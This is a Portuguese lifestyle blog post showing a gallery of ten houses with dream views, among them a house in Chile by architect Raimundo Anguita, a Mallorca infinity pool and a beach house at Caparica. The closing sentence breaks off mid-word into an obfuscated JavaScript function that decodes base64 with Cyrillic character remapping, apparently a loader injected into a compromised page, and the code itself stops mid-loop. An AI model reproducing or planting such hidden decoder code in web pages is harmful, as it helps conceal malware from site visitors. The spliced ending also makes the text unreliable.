Há lugares verdadeiramente inspiradores e irrepetíveis, não é? E, como estamos no verão, tudo o que apetece é sair e procurar novos lugares onde possamos lavar as vistas e a alma. Deixar entrar as boas energias e sermos nós próprios. Apetece mar, apetece azul, verde, natureza pura, brisas quentes e céus estrelados. Veja esta galeria de casas com vistas de sonho e atreva-se a sonhar!
Uma casa linda, recatada, onde tudo o que se ouve é o som do vento na vegetação. Com vista sobre o Canyon, certamente é um espaço onde apetece demorar e aproveitar cada momento como se o amanhã não chegasse! É, de facto, um lugar encantado!
Tudo é magnífico nesta imagem! Tudo está certo, tudo tem qualquer coisa de extremamente apetecível. Os pequenos-almoços tardios e repletos de iguarias com que nos mimamos em dias especiais, o céu aberto e a plenitude da vista. Uma casa inserida na selva, virada para o oceano: a pura comunhão com a natureza! Amo!
Diz-se que as fotografias são boas quando nos fazem sentir qualquer coisa, seja lá o que for. Quando eu olho para esta, sinto uma paz absoluta, uma serenidade plena. Sonho com viagens e já quase me sinto com os pés naquela areia ainda por tocar! Sente o mesmo? Imagine-se na varanda daquelas casas, respire a maresia e observe o horizonte longínquo... Ahhh.. Como é bom sonhar!
Esta casa fantástica é obra do arquiteto Raimundo Anguita e fica no Chile. Parece difícil imaginar que um edifício em betão acabe sendo uma homenagem à natureza! Um poema dedicado ao mar e às estrelas em forma de habitação. Deixa contemplar toda a imensidão envolvente que é por si só deslumbrante. Os espaços amplos a céu aberto convidam a serões de conversa e vinho, depois de um dia de praia!
Este sítio é fabuloso e não está assim tão longe daqui. É em Maiorca e, assim de repente, não me lembro de sítio melhor onde pudesse estar agora. As piscinas “infinitas” são sempre deliciosas, sobretudo quando a vista é tão incrível como esta... Um azul imenso, uma serra linda! Se o tempo parasse, era num sítio destes que eu gostaria de aproveitar! E você? Sente o mesmo?
No Cambodja também não fazem a coisa por menos... Uma casa envidraçada que deixa entrar a paisagem verdejante e pura! Até no banho a vista é maravilhosa e sabe a verão! Tudo é natural e faz sentir que estamos a mergulhar nas águas do oceano! Que sensação de liberdade, mesmo entre quatro paredes, não é?!
Como não adorar este lugar?! Uma lufada de ar fresco para o corpo e para o espírito! Uma piscina apetitosa, mas uma vista ainda melhor! Sente-se na imagem a tranquilidade do oceano e a paisagem dunar, bem bonita e diferente das anteriores mais verdes. Apetece mesmo ir explorar, verdade?
O verão sabe bem, sabem bem as praias, sabe bem o rio, o campo. Mas este sítio encantador é mesmo no meio do deserto. E quem disse que o verão não pode ser também sinónimo de retiro, de ausência completa e absoluta do mundo real, sem telemóveis (sim!!!) e desfrutar somente do planeta Terra?! Esta casa é isso que oferece, uma vista estonteante para as colinas do deserto, onde aposto que nos devemos sentir muito pequeninos. Uma maravilha!
Há algo de muito reconfortante neste sítio. Quando olho para esta imagem, imagino bons momentos entre amigos. O campo é lindo para passar tempos calmos, para poder repor energias. Ter uma casa de férias destas deve ser um verdadeiro prazer. Repare bem nas janelas, enormes, com vista para o pátio e depois para os campos!
Pernoitar nesta casa, deve ser praticamente o mesmo que dormir com um pé na areia! Mesmo em cima de uma duna, todo o mar imenso é o pano de fundo. É uma verdadeira Beach House ou casa de praia, e sabe o melhor de tudo? É EM PORTUGAL! Na Caparica, há casas com vistas deslumbrantes e estas são mesmo na praia da Cornélia. Linda de morrer!
Se gostou de conhecer estas 10 casas com vistas de sonho, espreite também estes 10 quintais e estasfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa